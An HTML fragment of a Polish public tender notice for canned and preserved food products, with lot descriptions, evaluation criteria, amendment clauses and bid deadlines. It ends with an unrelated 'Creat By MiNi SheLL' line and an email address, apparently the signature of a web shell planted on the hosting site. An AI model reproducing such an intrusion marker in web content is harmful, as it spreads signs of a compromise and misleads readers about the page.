właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin dostawy cząstkowej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin rozpatrzenia reklamacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Chrzan konserwowy, tarty op. min. 0,29 kg – max.0,50 kg<br/><br/><br/>Groszek zielony, konserwowy op.min. 0,22 kg – max. 0,50 kg netto (bez zalewy)<br/><br/><br/>Gulasz angielski - konserwa mięsna / o zawartości mięsa wieprzowego min. 75 %, op. 300 g<br/>Ketchup (łagodny, pikantny, zawartość przecieru z pomidorów min. 60%) w plastikowym opakowaniu, op. 500 ml<br/><br/>Koncentrat pomidorowy 30% zagęszczony, pasteryzowany, bez konserwantów, op. min. 0,20 kg - max. 1 kg<br/><br/>Konserwa rybna (ryba w oleju lub pomidorach, op. min. 125 g - max. 170 g, opakowanie pozwalające na otwarcie bez użyciaotwieracza) <br/><br/>Kukurydza konserwowa op. min. 0,22 - max 0,50 kg netto bez zalewy<br/><br/>Majonez gęsty, dekoracyjny, op. min. 1 kg - max. 5 kg (zamienić na L i dołączyć rozliczenie do zał. nr 1, ilośc kg nie może być mniejsza)<br/><br/>Musztarda w plastikowym opakowaniu, op. min. 0,18 kg – max. 0,30 kg<br/><br/>Paprykarz rybny (zawartość rozdrobninej ryby min. 24%, opakowanie pozwalające na otwarcie bez użycia otwieracza), op min. 0,11 kg – max. 0,16 kg<br/>Pasta sojowa z dodatkiem warzyw, różne smaki (opakowanie pozwalające na otwarcie bez użycia otwieracza) op. min. 0,05 kg – max. 0,13 kg<br/>Pasztet drobiowy (zawartość rozdrobnionego mięsa z kurcząt min. 38%, opakowanie pozwalające na otwarcie bez użycia otwieracza) op. min. 0,50 kg – max. 0,10 kg<br/><br/>Pasztet sojowy, opakowanie pozwalające na otwarcie bez użycia otwieracza, op. min. 0,05 kg – max. 0,13 kg<br/><br/><br/>Szczaw konserwowy, siekany, op. min. 0,28 kg – max. 0,40 kg<br/><br/><br/>Śledź Matjas solony, bez dodatku cebuli, kapusty, ogórków itp. dodatków, op.min. 1 kg – max. 10 kg/ netto bez dodatków </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15800000-6 - Różne produkty spożywcze</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin dostawy cząstkowej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin rozpatrzenia reklamacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zmiana niniejszej umowy jest możliwa w przypadku:<br/>a) zmiany terminu dostawy z przyczyn niezależnych od Wykonawcy,<br/>b) ustawowej zmiany stawki podatku VAT, w przypadku zmiany stawki podatku VAT na wyroby będące przedmiotem<br/>zamówienia, cena ulegnie zmianie z dniem wejścia w życie aktu prawnego określającego zmianę stawki VAT,<br/>z zastrzeżeniem, że zmianie ulegnie wówczas wyłącznie cena brutto, cena netto pozostanie bez zmian, zmiana umowy<br/>w tym przypadku nastąpi automatycznie i nie wymaga formy aneksu<br/>c) wprowadzenia nowej technologii lub innych okoliczności pozwalających na obniżenie ceny przedmiotu umowy,<br/>d) zmiany nazwy producenta produktu objętego umową,<br/>e) zmian danych identyfikujących strony - zgodnie z zapisami w aktualnym odpisie z właściwego rejestru,<br/>2. Zamawiający przewiduje także możliwość dokonania zmiany umowy na podstawie artykułu 455 ust. 1 pkt. 2 i 3:<br/>2.1. Zgodnie z art. 455 ust. 1 pkt 2 p.z.p. zmiana umowy jest dopuszczalna gdy nowy Wykonawca ma zastąpić<br/>dotychczasowego Wykonawcę:<br/>2.2. Zgodnie z art. 455 ust. 1 pkt 3 p.z.p. zmiana umowy jest dopuszczalna jeżeli dotyczy realizacji, przez dotychczasowego<br/>Wykonawcę, dodatkowych dostaw, których nie uwzględniono w zamówieniu podstawowym, o ile stały się one niezbędne i<br/>zostały spełnione łącznie następujące warunki:<br/>2.3. Zgodnie z art. 455 ust. 1 pkt 4 zmiany umowy spowodowana jest okolicznościami, których zamawiający, działając z<br/>należytą starannością, nie mógł przewidzieć, o ile zmiana nie modyfikuje ogólnego charakteru umowy a wzrost ceny<br/>spowodowany każdą kolejną zmianą nie przekracza 50% wartości pierwotnej umowy<br/>3. Obniżenie ceny oferowanych produktów przez Wykonawcę może nastąpić w każdym czasie i nie wymaga zgody<br/>Zamawiającego ani sporządzania aneksu do umowy.<br/>4. Zamawiający przewiduje zmianę terminu obowiązywania umowy w przypadku:<br/>a) wcześniejszego jej zrealizowania w zakresie dostaw przedmiotu umowy – wówczas umowa wygasa;<br/>b) niewyczerpania wartości umowy w terminie jej obowiązywania – wówczas w drodze aneksu, można przedłużyć<br/>przedmiotową umowę nie dłużej jednak niż o 3 miesiące, w zakresie zadań w których w okresie obowiązywania umowy<br/>nie dokonano jej realizacji w ilościach określonych w poszczególnych pozycjach oferty.<br/>5. Inne zmiany umowy dopuszczalne będą o ile nie będą istotne w stosunku do treści oferty.<br/>6. Zmiana niniejszej umowy wymaga formy pisemnej pod rygorem nieważności, z zastrzeżeniem ust. 1 lit. b) oraz ust 3.<br/>7. Każda zmiana może nastąpić w drodze aneksu do umowy, po zaakceptowaniu przez Zamawiającego wniosku<br/>Wykonawcy,<br/>z zastrzeżeniem ust. 1 lit. b) oraz ust 3.<br/>8. Wniosek winien być złożony w formie pisemnej i zawierać uzasadnienie, z zastrzeżeniem ust. 1 lit. b) oraz ust 3.<br/>9. W przypadku braku dostępności oferowanego produktu z przyczyn leżących po stronie producenta Wykonawca<br/>zobowiązany<br/>jest dostarczyć produkt zamienny po uprzednim pisemnym zawiadomieniu o tym Zamawiającego i uzyskaniu od niego<br/>pisemnej zgody. Cena produktu zamiennego nie może być wyższa niż produktu podanego w ofercie.<br/>10. Jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby wykonawca powoływał się, na<br/>zasadach określonych w art. 118 ust. 1 ustawy p.z.p., w celu wykazania spełniania warunków udziału w postępowaniu,<br/>wykonawca jest obowiązany wykazać zamawiającemu, że proponowany inny podwykonawca lub wykonawca samodzielnie<br/>spełnia je w stopniu nie mniejszym niż podwykonawca, na którego zasoby wykonawca powoływał się w trakcie<br/>postępowania o udzielenie zamówienia. Przepis art. 122 ustawy p.z.p. stosuje się odpowiednio.<br/>11. Zmiana niniejszej umowy jest możliwa jeżeli łączna wartość zmian jest mniejsza niż progi unijne oraz jest niższa niż 10%<br/>wartości pierwotnej umowy.<br/>12. Zmiana niniejszej umowy wymaga formy pisemnej pod rygorem nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-11-08 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://portal.smartpzp.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-11-08 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-12-07</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com